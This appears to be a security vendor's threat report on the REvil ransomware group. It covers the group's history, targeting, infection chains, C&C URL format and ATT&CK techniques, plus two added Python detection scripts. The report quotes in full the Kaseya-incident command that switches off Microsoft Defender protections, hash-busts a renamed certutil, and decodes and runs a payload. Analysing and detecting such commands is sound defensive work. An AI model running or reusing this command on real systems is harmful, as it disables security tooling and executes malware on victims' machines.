- Ransomware Spotlight: REvil
The connection between Water Mare and REvil dates back to April 2019, the ransomware's first confirmed deployment. In June 2019, it was advertised on the XSS forum by an actor using the handle UNKN (Unknown), the same handle associated with REvil. It operated as a ransomware-as-a-service (RaaS): affiliates spread the ransomware to victims, while the REvil operators maintained the malware and the payment infrastructure.
In 2020, Water Mare acquired new capabilities and accesses through its affiliates that would be used in later attacks. These included PE injection via PowerShell and the KPOT credential stealer, whose source code UNKN won at auction. Affiliates also offered access to company networks and to a VPN server. Around this time, UNKN also tried to restrict the affiliate program to Russian-speaking members to keep outsiders from infiltrating it.
2021 was a series of highs and lows for Water Mare, culminating in the arrest of several affiliates and close public documentation of REvil's downfall. Early in the year, the group announced new developments such as plans for distributed denial-of-service (DDoS) attacks, which would have ushered in triple extortion tactics. However, REvil's biggest attacks, those on JBS and Kaseya, brought law enforcement agencies onto the group's heels.
The FBI later attributed the Kaseya and JBS attacks to the Water Mare intrusion set. Law enforcement reportedly gained access to the intrusion set's servers and retrieved the REvil master key, which was provided to Kaseya. Around the same time, distrust of the threat group began to take root: an affiliate claimed that the operators had used a backdoor in the ransomware to cut affiliates out of the negotiation process, foreshadowing REvil's unraveling.
Despite announcing its return in September, by October 2021 Water Mare's data leak site had become inaccessible and the affiliate program had been terminated. Suspected Water Mare affiliates were also being arrested or tracked down through the efforts of law enforcement agencies worldwide.
Ultimately, REvil’s activities placed it at the top of the list of ransomware operators that governments were eager to crack down on. In a global effort, law enforcement went after REvil operators both offline and online, leading to the shutdown of its operations and actual arrests.
Based on our findings on Water Mare, it is unlikely that the intrusion set will resurface under the name REvil, given the amount of negative publicity the moniker has received, for the following reasons:
We surmise that the group can persist by rebranding, a common tactic among ransomware operators and one the group has used before. Case in point: DarkSide renamed itself BlackMatter. Meanwhile, REvil's affiliates are likely to move to other ransomware operators, if they have not already done so. As for its operators, they will probably continue to work in, or move to, other ransomware operations, bringing their techniques with them. Therefore, for organizations wondering what comes next, there is still great value in understanding REvil's tactics, techniques, and procedures (TTPs).
One aspect that made REvil's operation infamous was its heavy extortion tactics. As mentioned earlier, the operators considered DDoS attacks and contacted victims' customers, business partners, and the media directly to pressure victims into paying. They also auctioned stolen data to put further duress on their victims.
REvil is also a well-known example of highly targeted ransomware: its operators chose tools on the basis of detailed knowledge of the targeted entities. This resulted in a varied arsenal and customized infection chains, as we elaborate on later.
To this end, REvil used tools like FileZilla to exfiltrate data and PsExec to propagate and remotely execute the ransomware and other files. It also used other tools and malware such as PC Hunter, AdFind, BloodHound, NBTScan, SharpSploit, third-party file sync tools, and Qakbot, a trojan used to deliver ransomware.
As our detections show, REvil attacks were concentrated largely in the US, with Mexico and Germany a distant second and third. This is consistent with the checks in REvil's code that purposely exclude countries in the Commonwealth of Independent States (CIS) from targeting.
Figure 1. Countries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)
Source: Trend Micro™ Smart Protection Network™ infrastructure
We saw the most REvil-related detections in the transportation industry, followed by the financial sector. In our report summarizing ransomware activity in the first half of 2021, transportation was already among the top three most targeted sectors, likely because of its role in the supply chain and logistics. In general, the top targeted sectors are all critical industries, further emphasizing the high-impact targeting REvil pursued, especially in 2021.
Figure 2. Industries with the highest number of attack attempts for the REvil ransomware (January 1 to December 6, 2021)
Source: Trend Micro Smart Protection Network infrastructure
Because of its targeted nature, REvil used a variety of tools and malware depending on what the situation dictated. Its operators appeared to work with a high level of knowledge of the victim's environment, as evidenced by the degree of customization in their attacks.
Figure 3. The general infection chain of REvil
Figure 4. A more targeted attack flow (top) and a simple attack flow (bottom)
Figure 5. Infection chain followed in the attack on Quanta Computer
Figure 6. Infection chain followed in the attack on Kaseya
Figure 7. An infection chain based on a more recent campaign
The threat actors behind REvil relied on a variety of affiliates for initial access. Their methods ranged from malspam emails carrying spear-phishing links or attachments, to RDP access with valid accounts, compromised websites, and exploits. These then led to the download and execution of the payload using living-off-the-land binaries such as CertUtil and PowerShell, or via Office macros. Threat actors could also take a more hands-on approach, using RDP and PsExec to take control of the network before deploying the payload. More recently, initial access via supply chain compromise has also been observed, leading to the installation of Sodinstall or Sodinokibi, as in the Kaseya incident.
Here are some of the common ways the payload was downloaded and executed, based on what was observed and reported previously:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\\agent.crt c:\\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\\agent.exe
Read left to right, this one-liner stalls with a long ping loop, uses Set-MpPreference to switch off Microsoft Defender's real-time monitoring, intrusion prevention, IOAV and script scanning, controlled folder access, network protection, and cloud reporting, copies certutil.exe to cert.exe and appends a random value so the copy's hash no longer matches the original binary, uses the copy to decode the dropped agent.crt into agent.exe, deletes the artifacts, and finally runs the decoded payload.
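As an added detection example (written for this page, not Trend Micro's own tooling), the following Python splits a cmd.exe one-liner such as the one above on `&` / `&&` and tags the behaviours it chains together: the ping-based delay, Defender tampering via Set-MpPreference, certutil.exe copied under a new name and hash-busted, the `-decode` that reconstructs the payload, and execution of the decoded file. The Set-MpPreference switch list and the tag thresholds are assumptions; the two benign command lines in `SAMPLES` are constructed, and the first entry reproduces the command quoted above.

```python
"""Tag the behaviours chained in a cmd.exe one-liner (added example, not the
article's code). Regex lists and thresholds are assumptions; SAMPLES contains
the command quoted in the article plus two constructed benign lines."""
import re

# Set-MpPreference switches that weaken Defender. Assumed list: any -Disable*
# set to $true, any -Enable* set to Disabled/AuditMode, cloud reporting off.
DEFENDER_TAMPER = re.compile(
    r"-Disable\w+\s+\$true"
    r"|-Enable\w+\s+(?:Disabled|AuditMode)"
    r"|-MAPSReporting\s+Disabled"
    r"|-SubmitSamplesConsent\s+NeverSend",
    re.IGNORECASE,
)
PING_DELAY = re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+(\d+)", re.IGNORECASE)
COPY_CERTUTIL = re.compile(r"\bcopy\b(?:\s+/y)?\s+(\S*certutil\.exe)\s+(\S+)", re.IGNORECASE)
APPEND_TO = re.compile(r">>\s*(\S+)")
DECODE = re.compile(r"(\S+)\s+-decode\s+(\S+)\s+(\S+)", re.IGNORECASE)


def _norm(token):
    """Normalise a path token: strip quotes, collapse doubled backslashes, lowercase."""
    return token.strip().strip("\"'").replace("\\\\", "\\").lower()


def analyze_cmdline(cmdline):
    """Return the behaviour tags found in one command line, in order of appearance."""
    steps = [s for s in re.split(r"\s*&&?\s*", cmdline) if s.strip()]
    tags = []
    renamed = None       # path certutil.exe was copied to, if any
    decoded_out = None   # file written by -decode, if any

    for step in steps:
        m = PING_DELAY.search(step)
        if m and int(m.group(1)) > 60 and "ping_delay" not in tags:
            tags.append("ping_delay")        # ping used as a sleep timer
        if DEFENDER_TAMPER.search(step) and "defender_tamper" not in tags:
            tags.append("defender_tamper")   # T1562 - Impair defenses
        m = COPY_CERTUTIL.search(step)
        if m:
            renamed = _norm(m.group(2))
            tags.append("renamed_certutil")  # LOLBin copied to dodge name-based rules
        m = APPEND_TO.search(step)
        if m and renamed and _norm(m.group(1)) == renamed:
            tags.append("hash_busting")      # bytes appended so the copy's hash changes
        m = DECODE.search(step)
        if m:
            tool = _norm(m.group(1))
            if tool == renamed or tool.rsplit("\\", 1)[-1] in ("certutil", "certutil.exe"):
                decoded_out = _norm(m.group(3))
                tags.append("certutil_decode")  # T1140 - Deobfuscate/decode files

    if decoded_out and any(_norm(s) == decoded_out for s in steps):
        tags.append("decoded_payload_executed")
    return tags


def verdict(tags):
    """Collapse the tag list into a triage verdict (thresholds are assumptions)."""
    if "certutil_decode" in tags and ("defender_tamper" in tags or "renamed_certutil" in tags):
        return "malicious"
    return "suspicious" if tags else "clean"


SAMPLES = {
    # The command quoted in the article (Kaseya incident), without the stray closing quote.
    "revil": (
        r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
        r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
        r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
        r'-DisableIOAVProtection $true -DisableScriptScanning $true '
        r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
        r'-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
        r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
        r'echo %RANDOM% >> C:\Windows\cert.exe & '
        r'C:\Windows\cert.exe -decode c:\\agent.crt c:\\agent.exe & '
        r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\\agent.exe'
    ),
    # Constructed benign lines: an admin checking a hash, and a file backup.
    "hash_check": r'"C:\WINDOWS\system32\cmd.exe" /c certutil -hashfile C:\installers\setup.msi SHA256',
    "backup": r'cmd.exe /c copy /y C:\reports\q3.xlsx D:\backup\q3.xlsx && echo done >> D:\backup\log.txt',
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        tags = analyze_cmdline(cmd)
        print(f"{name}: {verdict(tags)} {tags}")
```

Feed it the CommandLine field of Sysmon event ID 1 or Windows event 4688; a plain `certutil -hashfile` or an ordinary `copy` produces no tags, while the quoted chain yields all six tags and a "malicious" verdict. The copy-then-rename check matters because a rule keyed only on the process name `certutil.exe` misses the renamed `cert.exe`.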
REvil sent a report containing system information to its C&C servers. For each domain in the list carried in its configuration, it generated a pseudorandom URL from a fixed format. The URLs followed this format:
https://{Domain}/{String 1}/{String 2}/{random characters}.{String 3}
The domain and the strings here meant the following:
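As an added example (not code from the article), the following Python checks a web-proxy log for URLs matching the beacon shape above and counts, per client, how many of a sample's configured domains were reached that way. A single hit is weak evidence, since the three-segment shape is ordinary, but one host walking several domains from the configuration list with random file names is what the report routine produces. `CONFIG_DOMAINS` is a hypothetical placeholder for the domain list extracted from a sample, and the log lines are constructed.

```python
"""Proxy-log check for the REvil beacon URL shape
https://{Domain}/{String 1}/{String 2}/{random}.{String 3} (added example,
not the article's code). CONFIG_DOMAINS is a placeholder; the log is constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Hypothetical stand-in for the domain list extracted from a sample's configuration.
CONFIG_DOMAINS = {"config-domain-a.example", "config-domain-b.example"}

# Exactly three path segments, the last one "<random>.<ext>", no query string.
BEACON_PATH = re.compile(
    r"^/(?P<s1>[A-Za-z0-9_-]+)/(?P<s2>[A-Za-z0-9_-]+)/"
    r"(?P<rand>[A-Za-z0-9]+)\.(?P<s3>[A-Za-z0-9]+)$"
)


def parse_beacon(url):
    """Return the URL's components if it has the beacon shape, otherwise None."""
    u = urlsplit(url)
    if u.scheme != "https" or u.query or u.fragment or not u.hostname:
        return None
    m = BEACON_PATH.match(u.path)
    if not m:
        return None
    return {"domain": u.hostname, **m.groupdict()}


def scan_proxy_log(lines):
    """Map each client to the number of distinct config domains it reached
    with beacon-shaped URLs. Constructed log format:
    '<timestamp> <client_ip> <method> <url> <status>'."""
    per_client = defaultdict(set)
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[3]
        beacon = parse_beacon(url)
        if beacon and beacon["domain"] in CONFIG_DOMAINS:
            per_client[client].add(beacon["domain"])
    return {client: len(domains) for client, domains in per_client.items()}


def suspicious_clients(lines, min_domains=2):
    """Clients that hit at least min_domains configured domains (threshold is an assumption)."""
    return sorted(c for c, n in scan_proxy_log(lines).items() if n >= min_domains)


SAMPLE_LOG = [  # constructed for the example
    "2021-07-02T14:03:11Z 10.0.5.23 POST https://config-domain-a.example/static/assets/x7k2m9qa.gif 200",
    "2021-07-02T14:03:12Z 10.0.5.23 POST https://config-domain-b.example/news/temp/b41kd0zv.jpg 404",
    "2021-07-02T14:03:13Z 10.0.5.23 GET https://intranet.corp.example/portal/home 200",
    "2021-07-02T14:03:14Z 10.0.7.9 GET https://config-domain-a.example/static/assets/logo.png 200",
    "2021-07-02T14:03:15Z 10.0.7.9 GET https://cdn.example/a/b/c.css?v=3 200",
    "2021-07-02T14:03:16Z 10.0.9.4 GET https://config-domain-b.example/blog/2021/article.html 200",
]

if __name__ == "__main__":
    print(scan_proxy_log(SAMPLE_LOG))
    print(suspicious_clients(SAMPLE_LOG))
```

Because the beacon domains are usually legitimate compromised sites, matching on the domain list alone produces noise; the per-client fan-out across several configured domains within a short window is the more useful pivot.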
The impact and encryption routine itself did not change much since the ransomware's inception; what varied between samples was the embedded configuration. Examples of the configured items included the processes to terminate, the C&C domains to report to, and the file extension to use, among others.
MITRE ATT&CK tactics and techniques observed in REvil attacks:

Tactic | Techniques
---|---
Initial Access | T1566 - Phishing; T1190 - Exploit public-facing application; T1189 - Drive-by compromise; T1195 - Supply chain compromise; T1078 - Valid accounts
Execution | T1106 - Execution through API; T1059 - Command and scripting interpreter; T1129 - Shared modules; T1204 - User execution
Persistence | T1547 - Boot or logon autostart execution (creates registry Run entries so that it restarts in safe mode); T1574 - Hijack execution flow
Privilege Escalation | T1134 - Access token manipulation (uses the ImpersonateLoggedOnUser API to impersonate the security context of the logged-on user); T1068 - Exploitation for privilege escalation; T1574 - Hijack execution flow
Defense Evasion | T1027 - Obfuscated files or information; T1562 - Impair defenses; T1574 - Hijack execution flow
Discovery | T1083 - File and directory discovery; T1018 - Remote system discovery; T1057 - Process discovery; T1082 - System information discovery; T1012 - Query registry; T1063 - Security software discovery
Credential Access | T1003 - OS credential dumping; T1552 - Unsecured credentials
Lateral Movement | T1570 - Lateral tool transfer
Collection | T1560 - Archive collected data; T1005 - Data from local system
Command and Control | T1071 - Application layer protocol
Exfiltration | T1567 - Exfiltration over web service; T1048 - Exfiltration over alternative protocol
Impact | T1486 - Data encrypted for impact; T1489 - Service stop; T1490 - Inhibit system recovery; T1529 - System shutdown/reboot; T1491 - Defacement
Security teams can watch out for the presence of the following malware tools and exploits that are typically used in REvil attacks:
Initial Entry | Execution | Discovery | Privilege Escalation | Credential Access | Lateral Movement | Defense Evasion | Exfiltration |
---|---|---|---|---|---|---|---|
While REvil's operations have been shut down, organizations, government bodies, and perhaps even ordinary consumers will not easily forget the consequences of its attacks. Affiliates involved in REvil attacks could move to other ransomware operators, and REvil's TTPs can be mimicked in newer campaigns. The current shutdown is therefore a good opportunity to learn from REvil while the group lies low.
To help defend systems against similar threats, organizations can establish security frameworks that can allocate resources systematically for establishing a solid defense against ransomware.
Here are some best practices that can be included in these frameworks:
A multilayered approach helps organizations guard the possible entry points into their systems (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior at each of these layers help protect enterprises.
The IOCs for this article can be found here.
Actual indicators might vary per attack.